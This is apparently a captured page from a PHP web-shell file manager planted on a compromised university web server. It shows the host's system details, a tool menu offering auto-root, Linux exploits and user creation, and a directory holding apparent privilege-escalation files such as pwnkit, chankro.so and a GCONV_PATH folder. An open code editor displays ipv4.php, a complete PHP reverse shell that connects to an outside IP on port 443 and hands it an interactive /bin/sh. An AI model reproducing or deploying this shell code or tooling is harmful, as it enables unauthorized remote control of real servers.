Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxrwxr-x
about
[ DIR ]
drwxrwxr-x
asm
[ DIR ]
drwxr-xr-x
becas
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
carousel
[ DIR ]
drwxr-xr-x
carpeta
[ DIR ]
drwxr-xr-x
ccs_2025
[ DIR ]
drwxr-xr-x
contraloria
[ DIR ]
drwxr-xr-x
contraloriares
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dekode
[ DIR ]
drwxrwxr-x
documentos
[ DIR ]
drwxr-xr-x
domianos
[ DIR ]
drwxrwxr-x
GCONV_PATH=.
[ DIR ]
drwxrwxr-x
html3
[ DIR ]
drwxrwxr-x
inscripciones.aspx
[ DIR ]
drwxr-xr-x
jkt-pobox
[ DIR ]
drwxrwxr-x
mindfulness
[ DIR ]
drwxrwxr-x
promocion
[ DIR ]
drwxr-xr-x
Sbdfabk
[ DIR ]
drwxrwxr-x
sym404
[ DIR ]
drwxr-xr-x
tes
[ DIR ]
drwxrwxr-x
url
[ DIR ]
drwxrwxr-x
.htaccess
230
B
-rw-r--r--
.mad-root
0
B
-rw-rw-r--
acpid.socket
103
B
-rwxrwxrwx
auth.php
380
B
-rw-rw-r--
chankro.so
8.3
KB
-rw-rw-r--
cookies.php
215.33
KB
-rw-r--r--
defunct
2.7
MB
-rwx------
defunct.dat
23
B
-rw-------
google152d10ec11b28677.html
53
B
-rw-rw-r--
google52306c35488e1358.html
53
B
-rw-r--r--
index.php
13.15
KB
-rw-rw-r--
ipv4.php
1.78
KB
-rw-rw-r--
legal.php
1.56
KB
-rw-r--r--
logs.php
1.72
KB
-rw-r--r--
menu.php
6.65
KB
-rw-rw-r--
path.PHP
3.06
KB
-rw-rw-r--
public2.php
21.79
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxrwxr-x
sitemap.xml
500
B
-rw-rw-r--
spxmailer.php
4.75
KB
-rw-rw-r--
support.php
31
B
-rwxrwxrwx
surender.php
68
KB
-rw-r--r--
tecnologias_perfil.php
3
B
-rw-rw-r--
test.txt
0
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipv4.php
<?php set_time_limit(0); $ip='45.151.155.240'; $port=443;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; /bin/sh -i';$daemon=0;$debug=0;if(function_exists('pcntl_fork')){$pid=pcntl_fork();if($pid==-1){printit("ERROR: Can't fork");exit(1);}if($pid){exit(0);}if(posix_setsid()==-1){printit("Error: Can't setsid()");exit(1);}$daemon=1;}else{printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}chdir("/");umask(0);$sock=fsockopen($ip,$port,$errno,$errstr,30);if(!$sock){printit("$errstr ($errno)");exit(1);}$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$process=proc_open($shell,$descriptorspec,$pipes);if(!is_resource($process)){printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0],0);stream_set_blocking($pipes[1],0);stream_set_blocking($pipes[2],0);stream_set_blocking($sock,0);printit("Successfully opened reverse shell to $ip:$port");while(1){if(feof($sock)){printit("ERROR: Shell connection terminated");break;}if(feof($pipes[1])){printit("ERROR: Shell process terminated");break;}$read_a=array($sock,$pipes[1],$pipes[2]);$num_changed_sockets=stream_select($read_a,$write_a,$error_a,null);if(in_array($sock,$read_a)){if($debug)printit("SOCK READ");$input=fread($sock,$chunk_size);if($debug)printit("SOCK: $input");fwrite($pipes[0],$input);}if(in_array($pipes[1],$read_a)){if($debug)printit("STDOUT READ");$input=fread($pipes[1],$chunk_size);if($debug)printit("STDOUT: $input");fwrite($sock,$input);}if(in_array($pipes[2],$read_a)){if($debug)printit("STDERR READ");$input=fread($pipes[2],$chunk_size);if($debug)printit("STDERR: $input");fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit($string){if(!$daemon){print"$string\n";}} ?>
Close